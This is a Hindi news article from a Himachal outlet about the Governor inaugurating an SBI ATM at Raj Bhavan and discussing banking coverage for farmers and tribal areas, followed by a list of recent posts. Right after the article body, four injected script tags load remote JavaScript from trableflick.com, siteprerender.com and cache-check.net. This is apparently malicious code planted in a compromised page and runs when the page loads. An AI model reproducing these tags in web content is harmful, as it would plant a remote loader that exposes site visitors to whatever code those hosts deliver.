Categories: हिमाचल

राज्यपाल ने किया SBI के राजभवन ATM का उद्घाटन

<p>स्टेट बैंक ऑफ इंडिया के मुख्य महाप्रबंधक अनुकूल भटनागर और उत्तर भारत के उच्च अधिकारियों ने आज राजभवन में राज्यपाल बंडारू दत्तात्रेय से भेंट की। इस अवसर पर, राज्यपाल ने बैंक अधिकारियों से आम ग्राहकों के लिए विशेषकर कृषि एवं जनजातीय क्षेत्रों में दी जा रही बैंकिंग सुविधा पर विस्तृत चर्चा की। इससे पूर्व, राज्यपाल ने स्टेट बैंक ऑफ इंडिया के राजभवन एटीएम का उद्घाटन किया। राज्यपाल ने इस बात पर खुशी व्यक्त की कि एसबीआई द्वारा बैंकिंग क्षेत्र में पूर्ण रूप से तकनीकी का उपयोग किया जा रहा है और इसके 90 प्रतिशत से अधिक ग्राहक ऑन-लाईन एप्प का उपयोग कर रहे हैं, जो कोविड-19 की इस महामारी के दौरान फायदेमंद है।</p>

<p>उन्होंने कहा कि बैंक को विशेषकर महिलाओं, जनजातीय क्षेत्रों और अनुसूचित जाति एवं जनजाति वर्ग के लिए अलग से लाभप्रद योजनाओं को लागू किया जाना चाहिए। उन्होंने कहा कि विद्या पोर्टल जैसे अन्य छात्रवृति योजनाओं को और प्रभावी बनाये जाने की आवश्यकता है।&nbsp; दत्तात्रेय ने कहा कि प्रदेश मे बैंक की गरीब और कृषकों के लिए कवरेज को बढ़ाया जाना चाहिए। उन्होंने बैंक शाखाओं को और स्तरोन्नत करने व गुणवत्ता बढ़ाए जाने पर बल दिया। राज्यपाल ने सूक्ष्म एवं लघु औद्योगिक इकाइयों को दिए जाने वाले सहयोग के बारे में भी जानकारी हासिल की। उन्होंने प्रदेश में बेहतर सेवाओं के लिए बैंक की सराहना की।</p>

<p><img src=”/media/gallery/images/image(1615).png” style=”height:110px; width:900px” /></p>

<p>एसबीआई के मुख्य महाप्रबंधक अनुकूल भटनागर ने इस अवसर पर राज्यपाल का एटीएम उद्घाटन के लिए आभार व्यक्त किया। उन्होंने कहा कि एसबीआई ने राज्य में 600 से अधिक एटीएम स्थापित किए हैं ताकि लोगों को धन निकासी की सुविधा मिल सके। उन्होंने कहा कि यूनो एप्प के माध्यम से भी ग्राहकों को सेवाएं दी जा रही हैं। बैंक डिजीटल इंडिया को बढ़ावा दे रहा है। उन्होंने कहा कि राज्य में &lsquo;डोर स्टेप बैंकिंग&rsquo; को बढ़ावा दिया जा रहा है। इसके अलावा, जन धन योजना, अटल पैंशन योजना को प्रभावी बनाया गया है। उन्होंने जानकारी दी कि प्रदेश में रिकवरी दर सबसे अधिक है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1606043408333″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

रेणुका विधानसभा क्षेत्र को उप मुख्यमंत्री का तोहफा, 2.40 करोड़ के विकास कार्यों का शुभारंभ

नाहन। उप मुख्यमंत्री मुकेश अग्निहोत्री ने आज जिला सिरमौर के श्री रेणुका जी विधान सभा…

1 hour ago

जानें कौन सी योजना देगी 1% ब्याज पर 20 लाख का शिक्षा ऋण

  Shimla: डॉ. वाईएस परमार ऋण योजना को विस्तार सुक्‍खू सरकार ने विस्‍तार दिया है।…

2 hours ago

28 सितंबर को शांतिपूर्ण प्रदर्शन, फैसला न आने पर जेल भरो आंदोलन

  Shimla: संजौली अवैध मस्जिद विवाद शांत नहीं हुआ है। 28 सितंबर को देवभूमि संघर्ष…

3 hours ago

कंगना का कांग्रेस पर करारा वार: कांग्रेस को बच्चे पालने का शौक, पप्पू और बहन की हरकतें बचकानी

  Mandi: मंडी के गोहर में एक कार्यक्रम में सांसद कंगना ने कांग्रेस के शीर्ष…

3 hours ago

पीएम मोदी कर रहे बदनाम, हिमाचलआर्थिक तंगी से नहीं जूझ रहा: डिप्टी सीएम

  Sirmour: उपमुख्यमंत्री मुकेश अग्निहोत्री ने आरोप लगाया है कि भाजपा के केंद्रीय व प्रदेश…

4 hours ago

स्वच्छ रहेगा घर, नगर व पंचायत तभी तो स्वस्थ रहेगा इंसान: उषा बिरला

  Hamirpur: ग्राम पंचायत दडूही में सोमवार को स्वच्छ भारत मिशन के तहत स्वच्छता पखवाड़ा…

5 hours ago